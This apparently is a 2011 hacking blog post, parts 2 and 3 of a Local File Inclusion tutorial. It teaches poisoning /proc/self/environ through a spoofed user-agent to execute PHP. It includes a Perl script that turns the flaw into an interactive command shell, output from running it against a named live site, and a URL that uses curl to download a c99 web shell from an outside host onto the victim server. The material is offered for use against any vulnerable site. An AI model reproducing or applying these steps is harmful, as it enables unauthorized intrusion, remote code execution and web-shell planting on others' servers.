Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.

More specifically, the file /proc/self/environ of a php process running has something like this:
Code:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin�
SERVER_ADMIN=webmaster@this.domain�
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo�HTTP_KEEP_ALIVE=300�
(...)
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
Code:
http://somesite.com/index.php?file=../../../../../proc/self/environ
you guessed right. it works Smile the php system is actually executed Smile

So, after coding this little perl script
Code:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = ) {
chop($line);
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
}
print "jcfsprompt: ";
}
I tried something like this...

Code:
jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)

Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about:config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Code:
Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7
Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:
If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing
Code:
as useragent,type this:
Code:
Then load your vuln page like this:
Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:
Code:
http://yourvulnsite.com/c99.php
And that's all for now...cheers!
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security